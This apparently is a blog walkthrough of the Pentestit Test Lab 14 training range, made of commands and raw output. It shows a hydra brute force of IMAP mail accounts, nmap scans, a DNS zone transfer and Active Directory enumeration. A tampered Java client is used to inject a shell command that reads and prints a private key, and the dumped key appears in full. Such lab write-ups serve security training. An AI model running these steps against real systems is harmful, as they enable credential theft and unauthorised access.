Lab Pentestit 14 - writeup

blaszczakm.blogspot.com 4 lat temu
  1. Crack password for mail
# cat logins_mail.txt                                                                                                                        
sidorov@test.lab
ivanov@test.lab 
petrov@test.lab 
support@test.lab


hydra -L logins_mail.txt  -P /tmp/1 imap://192.168.101.14 -t 60 -f  -I                                                                             
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-12 17:45:04
[DATA] max 44 tasks per 1 server, overall 44 tasks, 44 login tries (l:4/p:11), ~1 try per task
[DATA] attacking imap://192.168.101.14:143/


[ERROR] IMAP LOGIN AUTH : 2 NO [AUTHENTICATIONFAILED] Authentication failed.


[143][imap] host: 192.168.101.14   login: support@test.lab password: PASSWORD
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-12 17:45:12


telnet 192.168.101.14 imap                                                         
Connected to 192.168.101.14.
Escape character is '^]'.
*
a1 LOGIN support@test.lab PASSWORD
a1 OK
^]
telnet> quit
Connection closed.






 root@kali  ~/ctf/pentestitlab14  unzip vpn.zip -d vpn                                                                                                                               
Archive:  vpn.zip
 extracting: vpn/user                
  inflating: vpn/vpn.conf            
 root@kali  ~/ctf/pentestitlab14  cd vpn                                                                                                                                               
 root@kali  ~/ctf/pentestitlab14/vpn  ls                                                                                                                                               
user  vpn.conf
 root@kali  ~/ctf/pentestitlab14/vpn           


  1. Connect to new VPN 

root@kali  ~/ctf/pentestitlab14/vpn  openvpn --config vpn.conf                                                                                                                     
Wed Feb 12 18:18:42 2020 WARNING: file 'user' is group or others accessible
Wed Feb 12 18:18:42 2020 OpenVPN 2.4.7 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Feb 20 2019
Wed Feb 12 18:18:42 2020 library versions: OpenSSL 1.1.1d  10 Sep 2019, LZO 2.10
Wed Feb 12 18:18:42 2020 WARNING: No server certificate verification method has been enabled.  See http://openvpn.net/howto.html#mitm for more info.
Wed Feb 12 18:18:42 2020 TCP/UDP: Preserving recently used remote address: [AF_INET]192.168.101.15:1194
Wed Feb 12 18:18:42 2020 Socket Buffers: R=[212992->212992] S=[212992->212992]
Wed Feb 12 18:18:42 2020 UDP link local (bound): [AF_INET][undef]:1194
Wed Feb 12 18:18:42 2020 UDP link remote: [AF_INET]192.168.101.15:1194
Wed Feb 12 18:18:42 2020 TLS: Initial packet from [AF_INET]192.168.101.15:1194, sid=6b57de4a c850dc54
Wed Feb 12 18:18:42 2020 WARNING: this configuration may cache passwords in memory -- use the auth-nocache option to prevent this
Wed Feb 12 18:18:42 2020 VERIFY OK: depth=1, C=RU, ST=Moscow, L=Moscow, O=test, OU=test, CN=test CA, name=EasyRSA, emailAddress=support@test.lab
Wed Feb 12 18:18:42 2020 VERIFY OK: depth=0, C=RU, ST=Moscow, L=Moscow, O=test, OU=test, CN=server, name=EasyRSA, emailAddress=support@test.lab
Wed Feb 12 18:18:42 2020 Control Channel: TLSv1.2, cipher TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 2048 bit RSA
Wed Feb 12 18:18:42 2020 [server] Peer Connection Initiated with [AF_INET]192.168.101.15:1194
Wed Feb 12 18:18:43 2020 SENT CONTROL [server]: 'PUSH_REQUEST' (status=1)
Wed Feb 12 18:18:43 2020 PUSH: Received control message: 'PUSH_REPLY,route 172.16.0.0 255.255.0.0,route 10.11.0.1,topology net30,ifconfig 10.11.0.42 10.11.0.41,peer-id 9,cipher AES-256-GCM'
Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: --ifconfig/up options modified
Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: route options modified
Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: peer-id set
Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: adjusting link_mtu to 1625
Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: data channel crypto options modified
Wed Feb 12 18:18:43 2020 Data Channel: using negotiated cipher 'AES-256-GCM'
Wed Feb 12 18:18:43 2020 Outgoing Data Channel: Cipher 'AES-256-GCM' initialized with 256 bit key
Wed Feb 12 18:18:43 2020 Incoming Data Channel: Cipher 'AES-256-GCM' initialized with 256 bit key
Wed Feb 12 18:18:43 2020 ROUTE_GATEWAY 192.168.51.1/255.255.255.0 IFACE=eth0 HWADDR=08:00:27:a0:58:f0
Wed Feb 12 18:18:43 2020 TUN/TAP device tun1 opened
Wed Feb 12 18:18:43 2020 TUN/TAP TX queue length set to 100
Wed Feb 12 18:18:43 2020 /sbin/ip link set dev tun1 up mtu 1500
Wed Feb 12 18:18:43 2020 /sbin/ip addr add dev tun1 local 10.11.0.42 peer 10.11.0.41
Wed Feb 12 18:18:44 2020 /sbin/ip route add 172.16.0.0/16 via 10.11.0.41
Wed Feb 12 18:18:44 2020 /sbin/ip route add 10.11.0.1/32 via 10.11.0.41
Wed Feb 12 18:18:44 2020 Initialization Sequence Completed


We have new subnet - 172.16.0.0/16


  1. Scan 172.16.0.0/16 (masscan, nmap)

    nmap -T5 -n -sn 172.16.0.0/24                                                                                                             ✔ ⚡ 3457 21:21:05
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-13 09:32 CET
Nmap scan report for 172.16.0.11
Host is up (0.071s latency).
Nmap done: 256 IP addresses (1 host up) scanned in 34.57 seconds


Nmap scan report for 172.16.0.20
Host is up (0.052s latency).
Not shown: 850 filtered ports, 139 closed ports
PORT     STATE SERVICE
53/tcp   open domain
88/tcp   open kerberos-sec
135/tcp  open msrpc
139/tcp  open netbios-ssn
389/tcp  open ldap
445/tcp  open microsoft-ds
464/tcp  open kpasswd5
636/tcp  open ldapssl
1024/tcp open  kdm
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl


Nmap scan report for 172.16.0.10
Host is up (0.052s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE
53/tcp open  domain


  1. client.jar


 root@kali  ~/ctf/pentestitlab14  java -jar client.jar                                                                                                                              
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
/dev/sda1        15G 2.0G 13G 14% /
 root@kali  ~/ctf/pentestitlab14         


  1. edit client.jar
https://www.talksinfo.com/how-to-edit-class-file-from-a-jar/
jar -xf client.jar




oot@kali  ~/ctf/pentestitlab14/client-jar  cd ..                                                                                                         ✔ ⚡ 3397 20:23:21
 root@kali  ~/ctf/pentestitlab14  cp /media/sf_E_DRIVE/Downloads/client-jar/ . -r                                                                                                      ✔ ⚡ 3398 20:24:04
 root@kali  ~/ctf/pentestitlab14  cd -                                                                                                                               ✔ ⚡ 3399 20:24:07
~/ctf/pentestitlab14/client-jar
 root@kali  ~/ctf/pentestitlab14/client-jar  jar uf client.jar lab/test/client/Main.class                                                                                              ✔ ⚡ 3400 20:24:13
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
 root@kali  ~/ctf/pentestitlab14/client-jar  java -jar client.jar                                                                                                         ✔ ⚡ 3401 20:24:21





one liner:


root@kali  ~/ctf/pentestitlab14/client-jar  cd .. && cp /media/sf_E_DRIVE/Downloads/client-jar/ . -r && cd client-jar && jar uf client.jar lab/test/client/Main.class && java -jar client.jar




ldc "ls -al /home/dev/.crt;cat /home/dev/.crt/dev.crt;echo -e "\n\n\n\n"; cat /home/dev/.crt/dev.key;"


drwxr-xr-x 2 root root 4096 Nov 14 18:44 .
drwxr-xr-x 3 dev  dev 4096 Nov 14 18:42 ..
-rw-r--r-- 1 root root 5358 Nov 14 18:43 dev.crt
-rw-r--r-- 1 root root 1705 Nov 14 18:43 dev.key
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 3 (0x3)
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=RU, ST=Moscow, L=Moscow, O=test, OU=test, CN=test CA/name=EasyRSA/emailAddress=support@test.lab
        Validity
            Not Before: Nov 14 07:50:50 2019 GMT
            Not After : Nov 11 07:50:50 2029 GMT
        Subject: C=RU, ST=Moscow, L=Moscow, O=test, OU=test, CN=dev/name=EasyRSA/emailAddress=support@test.lab
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Modulus:
                    00:ae:dc:b6:2b:c2:31:3e:e6:e7:de:88:e7:c6:a2:
                    1b:d2:9a:a1:8f:dd:8d:07:03:ad:24:f9:85:d0:dd:
                    5b:de:96:2f:95:66:b3:cc:25:b5:c6:f1:7f:ec:66:
                    d8:c7:84:e2:f0:db:6e:4a:8f:ee:b7:f2:c2:6e:cf:
                    f6:13:eb:a9:ba:2c:58:a3:1e:1f:ab:6b:4a:ec:39:
                    be:be:b8:3c:67:b2:24:cd:7a:49:fd:00:59:f5:9d:
                    b8:14:cc:e7:47:ae:ce:03:18:92:21:1d:6f:31:04:
                    aa:9e:aa:7e:76:99:b4:40:53:33:9f:67:f2:66:7f:
                    e7:f9:22:2f:c7:3b:8e:3a:08:0c:d7:7b:39:20:e0:
                    33:38:65:20:91:4c:2b:eb:b3:d4:9b:dd:06:05:90:
                    ae:47:6b:91:55:2b:9e:06:58:de:62:68:92:d8:94:
                    2c:f7:61:a1:f6:22:c9:4a:7c:dd:06:bf:fb:0d:b3:
                    1d:2d:1c:a4:ea:8e:70:28:bd:be:d3:43:23:6f:ba:
                    dc:94:db:da:82:52:58:fb:36:45:06:c2:c4:37:c5:
                    e6:c8:73:a5:3d:2f:a6:11:d4:d6:19:29:65:99:8b:
                    5b:87:e1:51:b0:f6:12:8a:d0:02:84:45:13:85:69:
                    22:ed:07:44:3c:a7:6b:91:32:a2:4f:2b:9e:79:83:
                    46:b3
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Basic Constraints: 
                CA:FALSE
            Netscape Comment: 
                Easy-RSA Generated Certificate
            X509v3 Subject Key Identifier: 
                51:51:D9:D1:8E:E2:36:87:DE:62:E3:98:68:7D:68:DB:E3:AB:35:87
            X509v3 Authority Key Identifier: 
                keyid:61:14:9C:EE:28:7B:A5:2D:69:B6:AB:34:C9:9B:87:73:07:49:20:69
                DirName:/C=RU/ST=Moscow/L=Moscow/O=test/OU=test/CN=test CA/name=EasyRSA/emailAddress=support@test.lab
                serial:F5:C2:6A:50:05:37:8F:F8


            X509v3 Extended Key Usage: 
                TLS Web Client Authentication
            X509v3 Key Usage: 
                Digital Signature
            X509v3 Subject Alternative Name: 
                DNS:dev
    Signature Algorithm: sha256WithRSAEncryption
         86:02:4e:d1:25:78:1f:a9:8a:f9:c9:52:7c:4b:92:e4:59:bf:
         33:37:86:54:cc:0a:54:a5:5b:8c:70:ba:9d:92:12:24:f8:aa:
         80:7a:f0:4b:9a:c1:d1:93:95:c9:72:04:96:d3:8e:30:3d:26:
         53:d8:12:e7:31:9a:71:a1:29:31:8b:83:21:fa:fe:e9:93:9b:
         af:6c:e4:6f:93:03:ba:a2:8b:53:0f:4d:d9:3b:af:c1:75:36:
         3f:3f:1f:28:28:9f:36:37:a3:f2:b8:d7:89:bd:f5:6d:f8:cf:
         7a:ac:2f:88:22:6e:9e:00:30:14:db:c6:2f:1b:54:bd:5e:9a:
         f5:46:7e:ca:e3:2e:54:f8:29:fd:67:38:9b:14:30:c6:e3:b6:
         de:6d:a4:5d:51:84:ec:48:19:7e:40:1f:56:4e:46:52:10:23:
         17:57:1c:f0:ce:96:70:9a:f8:e7:7b:51:00:d4:98:ce:09:16:
         d7:4b:72:7f:38:aa:ae:42:10:4b:4f:c3:f9:bc:8a:92:03:42:
         7b:1f:7c:8c:5e:3c:78:9a:f7:4c:f6:67:47:74:fb:8c:6f:75:
         31:8e:e5:43:14:7f:50:9e:c0:4f:fe:d4:ef:d0:44:3c:e5:f2:
         f5:46:e8:e9:da:92:b9:f2:d2:42:97:7c:05:b2:22:5d:0b:3b:
         71:3d:d0:a0
-----BEGIN CERTIFICATE-----
MIIE+DCCA+CgAwIBAgIBAzANBgkqhkiG9w0BAQsFADCBkjELMAkGA1UEBhMCUlUx
DzANBgNVBAgTBk1vc2NvdzEPMA0GA1UEBxMGTW9zY293MQ0wCwYDVQQKEwR0ZXN0
MQ0wCwYDVQQLEwR0ZXN0MRAwDgYDVQQDEwd0ZXN0IENBMRAwDgYDVQQpEwdFYXN5
UlNBMR8wHQYJKoZIhvcNAQkBFhBzdXBwb3J0QHRlc3QubGFiMB4XDTE5MTExNDA3
NTA1MFoXDTI5MTExMTA3NTA1MFowgY4xCzAJBgNVBAYTAlJVMQ8wDQYDVQQIEwZN
b3Njb3cxDzANBgNVBAcTBk1vc2NvdzENMAsGA1UEChMEdGVzdDENMAsGA1UECxME
dGVzdDEMMAoGA1UEAxMDZGV2MRAwDgYDVQQpEwdFYXN5UlNBMR8wHQYJKoZIhvcN
AQkBFhBzdXBwb3J0QHRlc3QubGFiMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB
CgKCAQEArty2K8IxPubn3ojnxqIb0pqhj92NBwOtJPmF0N1b3pYvlWazzCW1xvF/
7GbYx4Ti8NtuSo/ut/LCbs/2E+upuixYox4fq2tK7Dm+vrg8Z7IkzXpJ/QBZ9Z24
FMznR67OAxiSIR1vMQSqnqp+dpm0QFMzn2fyZn/n+SIvxzuOOggM13s5IOAzOGUg
kUwr67PUm90GBZCuR2uRVSueBljeYmiS2JQs92Gh9iLJSnzdBr/7DbMdLRyk6o5w
KL2+00Mjb7rclNvaglJY+zZFBsLEN8XmyHOlPS+mEdTWGSllmYtbh+FRsPYSitAC
hEUThWki7QdEPKdrkTKiTyueeYNGswIDAQABo4IBWTCCAVUwCQYDVR0TBAIwADAt
BglghkgBhvhCAQ0EIBYeRWFzeS1SU0EgR2VuZXJhdGVkIENlcnRpZmljYXRlMB0G
A1UdDgQWBBRRUdnRjuI2h95i45hofWjb46s1hzCBxwYDVR0jBIG/MIG8gBRhFJzu
KHulLWm2qzTJm4dzB0kgaaGBmKSBlTCBkjELMAkGA1UEBhMCUlUxDzANBgNVBAgT
Bk1vc2NvdzEPMA0GA1UEBxMGTW9zY293MQ0wCwYDVQQKEwR0ZXN0MQ0wCwYDVQQL
EwR0ZXN0MRAwDgYDVQQDEwd0ZXN0IENBMRAwDgYDVQQpEwdFYXN5UlNBMR8wHQYJ
KoZIhvcNAQkBFhBzdXBwb3J0QHRlc3QubGFiggkA9cJqUAU3j/gwEwYDVR0lBAww
CgYIKwYBBQUHAwIwCwYDVR0PBAQDAgeAMA4GA1UdEQQHMAWCA2RldjANBgkqhkiG
9w0BAQsFAAOCAQEAhgJO0SV4H6mK+clSfEuS5Fm/MzeGVMwKVKVbjHC6nZISJPiq
gHrwS5rB0ZOVyXIEltOOMD0mU9gS5zGacaEpMYuDIfr+6ZObr2zkb5MDuqKLUw9N
2TuvwXU2Pz8fKCifNjej8rjXib31bfjPeqwviCJungAwFNvGLxtUvV6a9UZ+yuMu
VPgp/Wc4mxQwxuO23m2kXVGE7EgZfkAfVk5GUhAjF1cc8M6WcJr453tRANSYzgkW
10tyfziqrkIQS0/D+byKkgNCex98jF48eJr3TPZnR3T7jG91MY7lQxR/UJ7AT/7U
79BEPOXy9Ubo6dqSufLSQpd8BbIiXQs7cT3QoA==
-----END CERTIFICATE-----




-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQCu3LYrwjE+5ufe
iOfGohvSmqGP3Y0HA60k+YXQ3Vveli+VZrPMJbXG8X/sZtjHhOLw225Kj+638sJu
z/YT66m6LFijHh+ra0rsOb6+uDxnsiTNekn9AFn1nbgUzOdHrs4DGJIhHW8xBKqe
qn52mbRAUzOfZ/Jmf+f5Ii/HO446CAzXezkg4DM4ZSCRTCvrs9Sb3QYFkK5Ha5FV
K54GWN5iaJLYlCz3YaH2IslKfN0Gv/sNsx0tHKTqjnAovb7TQyNvutyU29qCUlj7
NkUGwsQ3xebIc6U9L6YR1NYZKWWZi1uH4VGw9hKK0AKERROFaSLtB0Q8p2uRMqJP
K555g0azAgMBAAECggEAV6ofSmDY/4gTxuUsDdFH0ZXkWZPhGBsnutm91LClVjpF
MMmEalydfVeloocNNznP7KCV8pumOmJiR9vKqsIDHWsOJPj9N5tavINWtZb38aTF
/p3Iaia68wBXQVZYvP9OGQ9Ac4mmLRUB1Pn03NDCJV2RC+G5DNojGiuheGjLLRv3
2e9inBCF4PSktL4E9u7/2hr5xba2z0aVt47vkxe6Q+InfAHzaGO5S4wao4T4RXZp
CKgITg+9/VBQrHHaKqqwM9l/XZA68svNvD3P00krI9Jn6kriQPK0NKx/n/KyVixV
uG6ij5+tWrvHNihofGR7LoJ8wWMenO0QoMjgoNblQQKBgQDZkIS9udncO2HIB5/n
y2JIB89Ep6PtD1iYLhHInCpuIrYWvktk36GVLCe2TG2/6bqmJyFzM5uv0cnwbCHx
PYFods1/mA80K5p7n4lhviqgeogbC/PbIA4RGYW5JxTDk82LcIs4qg5n27lW+nY6
F7RkOVObXoIvZ5iitHTRjTo4pwKBgQDNwPQj7ER4Yxge7oF+HorXnkEWUiPiRV8K
3qJZS3T1DSxhkDTW+NcJnZ7GE7EGN+V9zFGUHFjoh0vmrFHzIub7n2eClNTvnkko
Z/1T2QLdg4pfnW+MMAqqas78b4m88X5j6C3OvXWvFzzNbqJKxi38M3CAgiS8gUZd
/h9yJ0F3FQKBgQC3lytciqNcI8P8rupyCH9z9xshfTFoTwXczSt2lMl9TM9JW+V1
Rv0sSylrvQzz4ID/yo+AjjE3aZm1xxnRX6x/AZmhrShPRuhCn7qnf3irGRsXb7uk
0mTsaxQbzO3JqETQAPWKqH4liBXbXtk7Zlt0I6f4uQS0igAUdKELX9iciwKBgGyT
nkI2tAszf88S3ZLIW0xdXsuAnR8SrIz334RvpVCLmxgBGWE3/4I7g0XTrl8xsBEq
eQJH00Mh4pPf6376tBmkjOMD1zp7tO91sOFGa5SpjaPXWL4JvBciNghQc8cZSTE/
nKy0nh2/jX57G3mKC0pDeuLVyr0PGysOp1l+DbXhAoGBANNm56+tofNITKiXCdTH
/ZSEuabW2mFxAs2U8HUlwgxv3fc4Uy8JuS+JBpOZ1vuAKLJbkZJiEgk/xTQa3J8i
OfpPfY0tkSzlVe8VWSvvFlS2LoeUBtsdtHlecTTUkFStbmQbYrKX7ATl1xZlcNey
i70HDndxU49PRN/6rMuSTzMK
-----END PRIVATE KEY-----


 root@kali  ~/ctf/pentestitlab14/client-jar  vim dev.crt.172.16.20.2                                                                                               SIGINT(2) ↵ ⚡ 3447 21:01:00
 root@kali  ~/ctf/pentestitlab14/client-jar  vim dev.key.172.16.20.2                                                                                                         ✔ ⚡ 3450 21:01:51
 root@kali  ~/ctf/pentestitlab14/client-jar  chmod 600 dev.key.172.16.20.2                                                                                                         ✔ ⚡ 3451 21:02:08
 root@kali  ~/ctf/pentestitlab14/client-jar               


cat /opt/token 
L0* Dws7m|b;ek


  1. 172.16.0.11



    root@kali  ~/ctf/pentestitlab14  curl http://172.16.0.11/token                                                                                                                        
#trfioefjio
 root@kali  ~/ctf/pentestitlab14    


  1. DNS

    root@kali  ~/ctf/pentestitlab14/client-jar  dig axfr @172.16.0.20 test.lab.                                                                                                         ✔ ⚡ 3515 15:07:15


; <<>> DiG 9.11.14-3-Debian <<>> axfr @172.16.0.20 test.lab.
; (1 server found)
;; global options: +cmd
test.lab. 3600 IN SOA ad1.test.lab. hostmaster.test.lab. 1 900 600 86400 3600
; Transfer failed.
 root@kali  ~/ctf/pentestitlab14/client-jar  dig axfr @172.16.0.10 test.lab.                                                                                                         ✔ ⚡ 3516 15:07:17


; <<>> DiG 9.11.14-3-Debian <<>> axfr @172.16.0.10 test.lab.
; (1 server found)
;; global options: +cmd
test.lab. 21600 IN SOA test.lab. ns1.test.lab. 117 5 30 21600 60
test.lab. 21600 IN NS ns1.test.lab.
test.lab. 21600 IN NS ns2.test.lab.
test.lab. 21600 IN A 172.16.0.20
test.lab. 21600 IN A 172.16.50.20
_kerberos._tcp.dc._msdcs.test.lab. 21600 IN SRV 0 0 88 test.lab.
_ldap._tcp.dc._msdcs.test.lab. 21600 IN SRV 0 0 389 test.lab.
gc._msdcs.test.lab. 21600 IN A 172.16.50.20
_ldap._tcp.gc._msdcs.test.lab. 21600 IN SRV 0 0 3268 test.lab.
_kerberos._tcp.test.lab. 21600 IN SRV 0 0 88 test.lab.
_kpasswd._tcp.test.lab. 21600 IN SRV 0 0 464 test.lab.
_ldap._tcp.test.lab. 21600 IN SRV 0 0 389 test.lab.
_kerberos._udp.test.lab. 21600 IN SRV 0 0 88 test.lab.
_kpasswd._udp.test.lab. 21600 IN SRV 0 0 464 test.lab.
admin.test.lab. 21600 IN A 172.16.40.3
dc.test.lab. 21600 IN A 172.16.50.20
dc1.test.lab. 21600 IN A 172.16.50.20
dc2.test.lab. 21600 IN A 172.16.0.20
dns.test.lab. 21600 IN A 172.16.0.10
dns.test.lab. 21600 IN A 172.16.50.10
elastic.test.lab. 21600 IN A 172.16.40.6
_ldap._tcp.ForestDnsZones.test.lab. 21600 IN SRV 0 0 389 test.lab.
git.test.lab. 21600 IN A 172.16.0.21
mail.test.lab. 21600 IN A 172.16.50.3
news.test.lab. 21600 IN A 172.16.50.21
ns1.test.lab. 21600 IN A 172.16.50.10
ns2.test.lab. 21600 IN A 172.16.0.10
site.test.lab. 21600 IN A 172.16.50.2
token-SDS34gs93.test.lab. 21600 IN A 127.0.0.1 new token :) (ns)
vpn-1.test.lab. 21600 IN A 172.16.50.11
vpn-2.test.lab. 21600 IN A 172.16.0.11
test.lab. 21600 IN SOA test.lab. ns1.test.lab. 117 5 30 21600 60


  1. DC2


 root@kali  ~/ctf/pentestitlab14  enum4linux 172.16.0.20 -u 'DC2\dev'  -p 'L1(#@ru0euh0if'                                                                         1 ↵ ⚡ 3600 16:25:46
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb 13 16:26:10 2020


 ========================== 
|    Target Information    |
 ========================== 
Target ........... 172.16.0.20
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 =================================================== 
|    Enumerating Workgroup/Domain on 172.16.0.20    |
 =================================================== 
[+] Got domain/workgroup name: TEST


 =========================================== 
|    Nbtstat Information for 172.16.0.20    |
 =========================================== 
Looking up status of 172.16.0.20
DC2             <00> - M <ACTIVE>  Workstation Service
DC2             <03> - M <ACTIVE>  Messenger Service
DC2             <20> - M <ACTIVE>  File Server Service
TEST            <1c> - <GROUP> M <ACTIVE>  Domain Controllers
TEST            <00> - <GROUP> M <ACTIVE>  Domain/Workgroup Name
__SAMBA__       <00> - <GROUP> M <ACTIVE> <PERMANENT>  Domain/Workgroup Name


MAC Address = 00-00-00-00-00-00


 ==================================== 
|    Session Check on 172.16.0.20    |
 ==================================== 
[+] Server 172.16.0.20 allows sessions using username '', password ''


 ========================================== 
|    Getting domain SID for 172.16.0.20    |
 ========================================== 
Domain Name: TEST
Domain Sid: S-1-5-21-518050695-217262318-2335301019
[+] Host is part of a domain (not a workgroup)


 ===================================== 
|    OS information on 172.16.0.20    |
 ===================================== 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 172.16.0.20 from smbclient: 
[+] Got OS info for 172.16.0.20 from srvinfo:
DC2            Wk Sv PrQ Unx NT SNT Samba 4.5.16-Debian
platform_id     : 500
os version      : 6.1
server type     : 0x809a03


 ============================ 
|    Users on 172.16.0.20    |
 ============================ 
index: 0x1 RID: 0x44f acb: 0x00000010 Account: sidorov Name: Maksim Sidorov Desc: 
index: 0x2 RID: 0x1f4 acb: 0x00000010 Account: Administrator Name: Desc: Built-in account for administering the computer/domain
index: 0x3 RID: 0x450 acb: 0x00000010 Account: ivanov Name: Ego Ivanov Desc: 
index: 0x4 RID: 0x458 acb: 0x00000010 Account: leonov Name:  Leonov Desc: 
index: 0x5 RID: 0x457 acb: 0x00000010 Account: petrov Name:  Petrov Desc: 
index: 0x6 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: Desc: Key Distribution Center Service Account
index: 0x7 RID: 0x1f5 acb: 0x00000215 Account: Guest Name: Desc: Built-in account for guest access to the computer/domain
index: 0x8 RID: 0x452 acb: 0x00000010 Account: token_OWdjwifiw0 Name:  Token Desc: 


user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[sidorov] rid:[0x44f]
user:[ivanov] rid:[0x450]
user:[token_OWdjwifiw0] rid:[0x452]
user:[petrov] rid:[0x457]
user:[leonov] rid:[0x458]


 ======================================== 
|    Share Enumeration on 172.16.0.20    |
 ======================================== 


Sharename       Type Comment
---------       ---- -------
netlogon        Disk      
sysvol          Disk      
IPC$            IPC IPC Service (Samba 4.5.16-Debian)
SMB1 disabled -- no workgroup available


[+] Attempting to map shares on 172.16.0.20
//172.16.0.20/netlogon Mapping: DENIED, Listing: N/A
//172.16.0.20/sysvol Mapping: DENIED, Listing: N/A
//172.16.0.20/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*


 =================================================== 
|    Password Policy Information for 172.16.0.20    |
 =================================================== 


[+] Attaching to 172.16.0.20 using a NULL share


[+] Trying protocol 139/SMB...


[+] Found domain(s):


[+] TEST
[+] BUILTIN


[+] Password Info for Domain: TEST


[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 268 days 23 hours 59 minutes 
[+] Password Complexity Flags: 000000


[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0


[+] Minimum password age: 268 days 2 minutes 
[+] Reset Account Lockout Counter: 30 minutes 
[+] Locked Account Duration: 30 minutes 
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set


[+] Retieved partial password policy with rpcclient:


Password Complexity: Disabled
Minimum Password Length: 7


 ============================= 
|    Groups on 172.16.0.20    |
 ============================= 


[+] Getting builtin groups:
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Account Operators] rid:[0x224]
group:[Server Operators] rid:[0x225]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]


[+] Getting builtin group memberships:


[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]


[+] Getting local group memberships:
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Cert Publishers
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Read-Only Domain Controllers
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\krbtgt
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Domain Controllers
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Schema Admins
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Domain Admins
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Group Policy Creator Owners
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Enterprise Admins


[+] Getting domain groups:
group:[Enterprise Read-Only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-Only Domain Controllers] rid:[0x209]
group:[DnsUpdateProxy] rid:[0x44e]


[+] Getting domain group memberships:
Group 'Group Policy Creator Owners' (RID: 520) has member: TEST\Administrator
Group 'Schema Admins' (RID: 518) has member: TEST\Administrator
Group 'Domain Admins' (RID: 512) has member: TEST\Administrator
Group 'Enterprise Admins' (RID: 519) has member: TEST\Administrator


 ====================================================================== 
|    Users on 172.16.0.20 via RID cycling (RIDS: 500-550,1000-1050)    |
 ====================================================================== 
[I] Found new SID: S-1-5-21-518050695-217262318-2335301019
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-518050695-217262318-2335301019 and logon username '', password ''
S-1-5-21-518050695-217262318-2335301019-500 TEST\Administrator (Local User)
S-1-5-21-518050695-217262318-2335301019-501 TEST\Guest (Local User)
S-1-5-21-518050695-217262318-2335301019-502 TEST\krbtgt (Local User)
S-1-5-21-518050695-217262318-2335301019-503 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-504 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-505 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-506 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-507 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-508 *unknown*\*unknown* (8)
